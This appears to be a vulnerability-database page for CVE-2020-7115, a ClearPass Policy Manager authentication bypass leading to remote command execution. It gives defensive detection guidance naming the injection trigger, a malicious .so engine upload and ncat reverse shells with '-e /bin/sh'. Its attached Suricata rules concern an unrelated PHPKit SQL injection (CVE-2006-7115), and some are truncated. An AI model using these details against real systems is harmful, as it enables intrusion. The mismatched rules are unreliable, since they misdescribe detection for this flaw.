CVE-2020-7115
published 2020-06-03CVE-2020-7115: The ClearPass Policy Manager web interface is affected by a vulnerability that leads to authentication bypass. Upon successful bypass an attacker could then…
PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
64.60%
99.1th percentile
The ClearPass Policy Manager web interface is affected by a vulnerability that leads to authentication bypass. Upon successful bypass an attacker could then execute an exploit that would allow to remote command execution in the underlying operating system. Resolution: Fixed in 6.7.13-HF, 6.8.5-HF, 6.8.6, 6.9.1 and higher.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arubanetworks | clearpass_policy_manager | — | — |
| arubanetworks | clearpass_policy_manager | 6.7.0 – 6.7.13 | — |
| arubanetworks | clearpass_policy_manager | >= 6.8.0 < 6.8.6 | 6.8.6 |
| arubanetworks | clearpass_policy_manager | >= 6.9.0 < 6.9.1 | 6.9.1 |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for HTTP POST requests to the endpoint /tips/tipsSimulationUpload.action, especially those containing a 'clientPassphrase' field with the value 'req -engine' followed by a path — this is the authentication bypass + engine injection trigger. ↗
- →Alert on file uploads of .so (shared object) files to the ClearPass web interface, particularly to the tipsSimulationUpload.action endpoint, as the exploit delivers a malicious OpenSSL engine as a .so file. ↗
- →Detect creation or presence of files matching the pattern /tmp/clientCertFile*.txt on ClearPass hosts, as the exploit drops the malicious engine payload to this path. ↗
- →Detect outbound ncat/netcat connections spawned from the ClearPass process with the '-e /bin/sh' flag, indicating a reverse shell established post-exploitation. ↗
- →The exploit targets unauthenticated access to the ClearPass web interface — alert on any unauthenticated POST to /tips/tipsSimulationUpload.action as this endpoint should require authentication. ↗
- ·The exploit specifically requires the malicious OpenSSL engine (.so) to be compiled on RHEL/CentOS 7.x for compatibility with the target ClearPass environment; detections for the .so upload may need to account for this platform-specific artifact. ↗
- ·Affected versions span multiple branches: ClearPass 6.7.x prior to 6.7.13-HF, 6.8.x prior to 6.8.5-HF, and 6.9.x prior to 6.9.1. Detection rules should not be scoped to only 6.7.0. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2006-7115 [HIGH] ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UNION SELECT
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UNION SELECT"; flow:established,to_server; http.uri; content:"/include.php?"; nocase; content:"catid="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2006-7115; reference:url,www.securityfocus.com/bid/21002; classtype:web-application-attack; sid:2004696; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name
Suricata
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2006-7115 [HIGH] ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid DELETE
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid DELETE"; flow:established,to_server; http.uri; content:"/include.php?"; nocase; content:"catid="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2006-7115; reference:url,www.securityfocus.com/bid/21002; classtype:web-application-attack; sid:2004698; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T11
Suricata
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2006-7115 [HIGH] ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid INSERT
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid INSERT"; flow:established,to_server; http.uri; content:"/include.php?"; nocase; content:"catid="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2006-7115; reference:url,www.securityfocus.com/bid/21002; classtype:web-application-attack; sid:2004697; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T11
Suricata
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2006-7115 [HIGH] ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UPDATE
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UPDATE"; flow:established,to_server; http.uri; content:"/include.php?"; nocase; content:"catid="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2006-7115; reference:url,www.securityfocus.com/bid/21002; classtype:web-application-attack; sid:2004700; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T119
Suricata
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2006-7115 [HIGH] ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid ASCII
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid ASCII"; flow:established,to_server; http.uri; content:"/include.php?"; nocase; content:"catid="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2006-7115; reference:url,www.securityfocus.com/bid/21002; classtype:web-application-attack; sid:2004699; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T11
Suricata
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2006-7115 [HIGH] ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid SELECT
ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid SELECT"; flow:established,to_server; http.uri; content:"/include.php?"; nocase; content:"catid="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2006-7115; reference:url,www.securityfocus.com/bid/21002; classtype:web-application-attack; sid:2004695; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T11
http://packetstormsecurity.com/files/158368/ClearPass-Policy-Manager-Unauthenticated-Remote-Command-Execution.htmlhttps://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-005.txthttp://packetstormsecurity.com/files/158368/ClearPass-Policy-Manager-Unauthenticated-Remote-Command-Execution.htmlhttps://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-005.txt
2020-06-03
Published